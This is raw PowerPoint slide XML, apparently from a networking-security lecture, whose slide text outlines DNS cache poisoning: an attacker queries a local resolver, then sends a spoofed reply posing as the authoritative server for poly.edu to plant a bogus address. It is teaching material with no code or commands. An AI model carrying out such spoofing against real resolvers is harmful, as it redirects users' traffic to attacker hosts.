              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1. DNS query</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>poly.edu=?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39952" name="Text Box 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2085" y="2226"/>
              <a:ext cx="932" cy="532"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>3. DNS reply</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>poly.edu= </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>17.32.8.9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39953" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2880" y="1518"/>
              <a:ext cx="234" cy="140"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39954" name="Line 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2991" y="1404"/>
              <a:ext cx="195" cy="202"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39955" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3202" y="1242"/>
              <a:ext cx="855" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2. iterative</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS queries</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39956" name="Line 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="942" y="1425"/>
              <a:ext cx="436" cy="7"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39957" name="Text Box 34"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3399" y="636"/>
              <a:ext cx="1110" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>authoritative</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS for poly.edu </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39958" name="Line 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2592" y="965"/>
              <a:ext cx="490" cy="296"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39959" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1876" y="2141"/>
              <a:ext cx="210" cy="350"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39960" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2576" y="1627"/>
              <a:ext cx="514" cy="70"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39941" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6653213" y="6632575"/>
            <a:ext cx="5692775" cy="2716213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Goal: Put bogus IP address for poly.edu</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in local Berkeley DNS server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1) Attacker queries local DNS server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2) Local DNS makes iterative queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3) Attacker waits for some time;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sends a bogus reply, spoofing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authoritative server for poly.edu.</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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A9ADE455-BCB9-4287-9C24-D290EBA7DDFC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="990600"/>
            <a:ext cx="11053763" cy="6096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Poisoning local DNS server (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Freeform 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3987800" y="3276600"/>
            <a:ext cx="2909888" cy="291465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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40965" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2297113" y="4062413"/>
          <a:ext cx="868362" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s41009" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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7113" y="4062413"/>
                        <a:ext cx="868362" cy="739775"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40966" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7956550" y="4908550"/>
            <a:ext cx="339725" cy="688975"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40989" name="AutoShape 6"/>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40990" name="Rectangle 7"/>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40991" name="Rectangle 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40992" name="AutoShape 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40993" name="Line 10"/>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en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40994" name="Line 11"/>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en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40995" name="Rectangle 1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40996" name="Rectangle 13"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40967" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7959725" y="2905125"/>
            <a:ext cx="338138" cy="688975"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40981" name="AutoShape 15"/>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40982" name="Rectangle 16"/>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40983" name="Rectangle 1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40984" name="AutoShape 1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40985" name="Line 19"/>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en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40986" name="Line 20"/>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en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40987" name="Rectangle 2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40988" name="Rectangle 22"/>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grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40968" name="Object 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4657725" y="6789738"/>
          <a:ext cx="869950" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s41010" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0"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7725" y="6789738"/>
                        <a:ext cx="869950" cy="739775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="40969" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8718550" y="4876800"/>
            <a:ext cx="3119438" cy="869950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poisoned local DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server (eg, Berkeley)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40970" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4213225" y="7593013"/>
            <a:ext cx="1781175" cy="1239837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in Australia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>17.32.8.9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40971" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3802063" y="3519488"/>
            <a:ext cx="2174875" cy="869950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. DNS query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ftp.poly.edu=?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40972" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5989638" y="6389688"/>
            <a:ext cx="2281237" cy="1239837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. DNS query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ftp.poly.edu=?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40973" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109913" y="4421188"/>
            <a:ext cx="984250" cy="15875"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40974" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8618538" y="2640013"/>
            <a:ext cx="2582862" cy="869950"/>
          </a:xfrm>
